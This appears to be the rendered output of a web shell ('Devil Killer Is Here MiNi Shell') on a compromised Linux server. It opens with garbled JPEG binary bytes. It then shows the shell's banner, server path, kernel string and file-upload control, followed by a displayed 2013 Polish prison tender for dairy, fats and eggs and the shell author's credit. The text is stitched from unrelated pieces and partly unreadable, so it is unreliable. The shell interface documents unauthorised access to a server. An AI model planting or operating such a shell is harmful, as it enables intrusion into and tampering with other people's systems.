JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131120/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131120/475258-N-2013.html

<p class="kh_header"><b>Cieszyn: Dostawa produktów mleczarskich, olejów i tłuszczów, jaj kurzych</b><br>
<b>Numer ogłoszenia: 475258 - 2013; data zamieszczenia: 20.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny w Cieszynie , ul. Chrobrego 2, 43-400 Cieszyn, woj. śląskie, tel. 033 8513220, 8513270, faks 033 8511755.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Zakład Karny.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa produktów mleczarskich, olejów i tłuszczów, jaj kurzych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia publicznego jest dostawa produktów mleczarskich, olejów i tłuszczów roślinnych lub zwierzęcych, jaj kurzych konsumpcyjnych - wg Wspólnego Słownika Zamówień główny przedmiot: kod CPV 15000000-8.
Zamówienie podzielone jest na trzy części:
A.	Część I - produkty mleczarskie

Przedmiotem zamówienia publicznego jest sukcesywna dostawa produktów mleczarskich, wg Wspólnego Słownika Zamówień: kod CPV 15500000-3
       w następującym asortymencie i ilościach:

L.p.	Nazwa	j.m.	Ilość
1.	Kefir	litr	400
2.	Mleko granulowane	kg.	950
3.	Twaróg	kg.	2200
4.	Serek naturalny homog.	kg.	1800
5.	Produkt topiony do smarowania - kostka 100g/szt.	kg.	900
6.	Serek maślany kanapkowy	kg.	350
7.	Serek Fromage	kg.	600
8.	Ser twardy 	kg.	800
9.	Śmietana 12%	litr	420


KEFIR
Skład: mleko pasteryzowane, żywe kultury bakterii, zawartość tłuszczu 1,5%, minimalny okres przydatności do spożycia od dnia dostarczenia do Zamawiającego - 14 dni.

MLEKO GRANULOWANE - odtłuszczone rozpuszczalne, w opakowaniach jednostkowych do 20 kg, minimalny okres przydatności do spożycia od dnia dostarczenia do Zamawiającego - 30 dni

TWARÓG PÓŁTŁUSTY
Ser biały - wytwarzany z mleka, o białej barwie i grudkowatej bądź kremowej konsystencji,
bez dodatków, w opakowaniu jednostkowym 0,25 kg/szt., etykietowany z naniesioną na każdym bloku datą przydatności do spożycia oraz składem chemicznym i surowcowym, minimalny okres przydatności do spożycia od dnia dostarczenia do Zamawiającego - 14 dni

SEREK NATURALNY HOMOGENIZOWANY 
Skład: mleko odtłuszczone, śmietanka, zawartość tłuszczu 3%, w opakowaniu jednostkowym od 100 do 150g./sztuka, etykietowany z naniesioną na każdej sztuce datą przydatności do spożycia oraz składem chemicznym i surowcowym, minimalny okres przydatności do spożycia od dnia dostarczenia do Zamawiającego - 14 dni.

PRODUKT TOPIONY DO SMAROWANIA - kostka 100 g/sztuka,
etykietowany z naniesioną na każdej sztuce datą przydatności do spożycia oraz składem chemicznym i surowcowym, minimalny okres przydatności do spożycia od dnia dostarczenia do Zamawiającego -30 dni.

SEREK MAŚLANY - KANAPKOWY
Skład: twaróg, tłuszcz mleczny 15 %, sól, skrobia modyfikowana, zagęstnik - guma guar,
w opakowaniu jednostkowym od 100 do 150g./sztuka, etykietowany z naniesioną na każdej sztuce datą przydatności do spożycia oraz składem chemicznym i surowcowym, minimalny okres przydatności do spożycia od dnia dostarczenia do Zamawiającego - 14 dni.

SEREK FROMAGE
Skład: twaróg, tłuszcz roślinny, sól, konserwant, opakowanie jednostkowe 100g/sztukę z naniesioną na każdej sztuce datą przydatności do spożycia oraz składem chemicznym i surowcowym, minimalny okres przydatności do spożycia od dnia dostarczenia do Zamawiającego - 14 dni.

SER TWARDY 
Foliowany w opakowaniu jednostkowym max.3 kg./blok, etykietowany z naniesioną na każdej sztuce datą przydatności do spożycia oraz składem chemicznym i surowcowym, minimalny okres przydatności do spożycia od dnia dostarczenia do Zamawiającego - 30 dni.

ŚMIETANA
Skład: śmietanka pasteryzowana, żywe kultury bakterii, tłuszcz 12%, etykietowana z naniesioną na każdej sztuce datą przydatności do spożycia oraz składem chemicznym i surowcowym, minimalny okres przydatności do spożycia od dnia dostarczenia do Zamawiającego - 14 dni.

Bieżąca realizacja dostaw: dostawy realizowane będą sukcesywnie po uprzednim zamówieniu telefonicznym lub drogą fax, w którym Zamawiający określi asortyment wraz z ilością. Zamówienie takie przeprowadzane będzie z tygodniowym wyprzedzeniem względem daty dostawy. Towar dostarczany będzie zamawiającemu do godz. 11 00 w dniu ustalonej dostawy według cen zgodnych z zawartą umową.

Podana ilość asortymentów jest szacunkowa i może ulec zmianie. Z tego powodu Wykonawcy nie będą przysługiwały żadne roszczenia wobec Zamawiającego.


B.	Część II - oleje i tłuszcze
Przedmiotem zamówienia publicznego jest sukcesywna dostawa oleju i tłuszczów zwierzęcych lub roślinnych dla potrzeb zamawiającego, wg Wspólnego Słownika Zamówień: kod CPV 15400000-2 w następującym asortymencie i ilościach:

L.p.	Nazwa	j.m.	Ilość
1.	Margaryna roślinna	kg.	6500
2.	Tłuszcz roślinny 	kg.	1800
3.	Smalec wieprzowy	kg.	200
4.	Olej roślinny rzepakowy	litr	1100


Margaryna roślinna - tłuszcz roślinny do smarowania pieczywa o maksymalnej zawartości tłuszczu do 60%, opakowanie jednostkowe 0,2 lub 0,25 kg.

Tłuszcz roślinny - do smarowania pieczywa o niskiej zawartości tłuszczu do 50% typu masło roślinne, opakowanie jednostkowe 0,2 lub 0,25 kg.

Smalec wieprzowy, w opakowaniach jednostkowych 0,2 kg.

Olej roślinny rzepakowy w opakowaniach jednostkowych od 1 litra do 5 litrów.

Bieżąca realizacja dostaw: dostawy realizowane będą sukcesywnie po uprzednim zamówieniu telefonicznym lub drogą fax, w którym Zamawiający określi asortyment wraz z ilością. Zamówienie takie przeprowadzane będzie z tygodniowym wyprzedzeniem względem daty dostawy. Towar dostarczany będzie zamawiającemu do godz. 11 00 w dniu ustalonej dostawy według cen zgodnych z zawartą umową.

Częstotliwość realizacji dostaw: jeden raz w tygodniu.
Minimalny okres przydatności do spożycia: licząc od daty dostarczenia towaru do magazynu Zakładu Karnego w Cieszynie, nie może być krótszy niż 30 dni.
Wszystkie partie towaru winny być oznakowane.
Oznakowanie towaru powinno być zgodne z obowiązującymi przepisami (m.in. nazwa producenta, termin przydatności do spożycia, gramatura). Wykonawca zobowiązany jest dostarczyć Zamawiającemu Handlowy Dokument Identyfikacyjny (HDI) dla tych partii towaru, dla których posiadanie wymienionego dokumentu jest wymagane.

Podana ilość asortymentów jest szacunkowa i może ulec zmianie. Z tego powodu Wykonawcy nie będą przysługiwały żadne roszczenia wobec Zamawiającego.

C.	Część III - jaja kurze
Przedmiotem zamówienia publicznego jest sukcesywna dostawa jaj kurzych dla potrzeb zamawiającego, wg Wspólnego Słownika Zamówień: kod CPV 03142500-3 w następującym asortymencie i ilościach:

L.p.	Nazwa	j.m.	Ilość
1.	jaja kurze	szt.	58 500

Warunki dodatkowe dotyczące przedmiotu zamówienia:
Jaja konsumpcyjne kurze, świeże Klasa A, grupa wagowa M (waga 53-63 g/szt.) dostawa jeden raz w tygodniu.

Oznakowanie towaru powinno być zgodne z obowiązującymi przepisami (m.in. nazwa producenta, termin przydatności do spożycia, gramatura). Wykonawca zobowiązany jest dostarczyć Zamawiającemu Handlowy Dokument Identyfikacyjny (HDI) dla tych partii towaru, dla których posiadanie wymienionego dokumentu jest wymagane.

Dostawy będą realizowane w dni robocze do godziny 11.00.
Podana ilość asortymentów jest szacunkowa i może ulec zmianie. Z tego powodu Wykonawcy nie będą przysługiwały żadne roszczenia wobec Zamawiającego..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.50.00.00-3, 03.14.25.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie wykonawcy o spełnianiu wymagań określonych w art. 22 ust. 1 ustawy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie wykonawcy o spełnianiu wymagań określonych w art. 22 ust. 1 ustawy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie wykonawcy o spełnianiu wymagań określonych w art. 22 ust. 1 ustawy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie wykonawcy o spełnianiu wymagań określonych w art. 22 ust. 1 ustawy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie wykonawcy o spełnianiu wymagań określonych w art. 22 ust. 1 ustawy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz cenowy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania następujących zmian w umowie dla wartości umowy brutto o różnicę wynikającą ze zmiany wartości podatku VAT w przypadku zmiany stawki podatku VAT w trakcie obowiązywania umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zp.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Karny w Cieszynie, ul. Chrobrego 2, 43-400 Cieszyn.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.11.2013 godzina 09:30, miejsce: sekretariat Zakładu Karnego w Cieszynie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> produkty mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Nazwa	j.m.	Ilość
1.	Kefir	litr	400
2.	Mleko granulowane	kg.	950
3.	Twaróg	kg.	2200
4.	Serek naturalny homog.	kg.	1800
5.	Produkt topiony do smarowania - kostka 100g/szt.	kg.	900
6.	Serek maślany kanapkowy	kg.	350
7.	Serek Fromage	kg.	600
8.	Ser twardy 	kg.	800
9.	Śmietana 12%	litr	420.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> oleje i tłuszcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Nazwa	j.m.	Ilość
1.	Margaryna 	kg.	6500
2.	Tłuszcz roślinny 	kg.	1800
3.	Smalec wieprzowy	kg.	200
4.	Olej roślinny rzepakowy	litr	1100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.40.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> jaja kurze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> jaja kurze	klasa wagowa M w ilości 	58 500 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com